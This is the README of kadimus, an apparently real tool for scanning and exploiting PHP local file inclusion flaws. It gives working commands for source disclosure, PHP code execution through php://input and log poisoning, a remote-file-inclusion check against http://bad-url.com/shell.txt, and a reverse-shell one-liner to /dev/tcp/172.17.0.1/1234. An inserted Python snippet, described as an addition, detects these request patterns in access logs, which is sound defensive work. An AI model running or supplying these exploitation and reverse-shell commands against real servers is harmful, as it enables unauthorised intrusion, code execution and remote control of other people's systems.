This repository has been archived by the owner on Oct 7, 2020. It is now read-only.

P0cL4bs/kadimus

kadimus

LFI Scan & Exploit Tool

kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Source code disclosure
  • Command shell interface through HTTP request
  • Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)
  • Proxy socks5 support for remote connections
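The techniques listed above leave distinctive request patterns in web server logs. As an added example that is not part of kadimus, the Python snippet below flags those patterns (null-byte truncation, traversal, php://, data: and expect: wrappers, /proc/self/environ, /var/log poisoning and remote includes) in access-log lines so a defender can spot scans like this one; it assumes Apache/nginx combined log format, and the log lines are constructed.

```python
"""Flag the LFI/RFI request patterns kadimus automates in web access logs.
Added example, not part of kadimus; the log lines below are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Indicator name -> regex tested against each decoded query-parameter value.
INDICATORS = {
    "null_byte":      re.compile(r"\x00"),                   # %00 path truncation
    "traversal":      re.compile(r"\.\.[/\\]"),
    "php_wrapper":    re.compile(r"^php://(input|filter)", re.I),
    "data_wrapper":   re.compile(r"^data:", re.I),
    "expect_wrapper": re.compile(r"^expect:", re.I),
    "proc_environ":   re.compile(r"/proc/self/environ"),
    "log_poisoning":  re.compile(r"/var/log/"),
    "remote_include": re.compile(r"^(https?|ftp)://", re.I),  # RFI
}
# Apache/nginx combined format (assumed): client IP first, request line in quotes.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return the sorted indicator names found in the query string of `target`."""
    found = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded %252e%252e%252f
        for name, pattern in INDICATORS.items():
            if pattern.search(value):
                found.add(name)
    return sorted(found)

def scan_access_log(lines):
    """Return one alert per log line whose request carries any indicator."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip it
        hits = classify_request(m.group("target"))
        if hits:
            alerts.append({"line": lineno, "client": m.group("client"), "indicators": hits})
    return alerts

# Constructed sample lines, not real traffic; line 1 is a benign request.
LOG_LINES = [
    '10.0.0.5 - - [14/Mar/2015:20:23:01 +0000] "GET /?pg=contact HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Mar/2015:20:23:02 +0000] "GET /?pg=../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "curl/7.40"',
    '10.0.0.9 - - [14/Mar/2015:20:23:03 +0000] "GET /?pg=php://input%00 HTTP/1.1" 200 87 "-" "curl/7.40"',
    '10.0.0.9 - - [14/Mar/2015:20:23:04 +0000] "GET /?pg=/proc/self/environ HTTP/1.1" 200 87 "-" "curl/7.40"',
    '10.0.0.9 - - [14/Mar/2015:20:23:05 +0000] "POST /?pg=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "curl/7.40"',
    '10.0.0.9 - - [14/Mar/2015:20:23:06 +0000] "GET /?pg=http://bad-url.com/shell.txt HTTP/1.1" 200 87 "-" "curl/7.40"',
]
```

Calling `scan_access_log(LOG_LINES)` returns alerts for lines 2 to 6 only; the double-encoded line 5 is caught because each value is decoded a second time.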

Compile:

First, make sure you have all dependencies installed in your system: libcurl, libopenssl, libpcre and libssh.

Then you can clone the repository, to get the source code:

$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

And finally:

$ make

Options:

Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry NUMBER              Number of times to retry if connection fails
    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)

  Scanner:
    -u, --url STRING            URL to scan/exploit
    -o, --output FILE           File to save output results

  Explotation:
    --parameter STRING          Parameter name to inject exploit
                                (only needed by RCE data and source disclosure)

  RCE:
    -T, --technique=TECH        LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP request

    --connect STRING            IP/hostname to connect to
    -p, --port NUMBER           Port number to connect to or listen on
    -l, --listen                Bind and listen for incoming connections

    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
    --ssh-target STRING         Set the SSH host

    RCE Available techniques

      environ                   Try to run PHP code using /proc/self/environ
      input                     Try to run PHP code using php://input
      auth                      Try to run PHP code using /var/log/auth.log
      data                      Try to run PHP code using data://text
      expect                    Try to run a command using expect://cmd

    Source Disclosure:
      -S, --source              Try to get the source file using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent

Get source code of file:

./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

Execute php code:

./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

Execute command:

./kadimus -u localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI: put the remote URL and the regex that identifies its output in resource/common_files.txt, in the form URL?:regex. For example, given this remote file:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

the matching entry in resource/common_files.txt is:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry 0

Contributing

You can help with code, or by donating. If you want to help with code, use the kernel code style as a reference.

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq
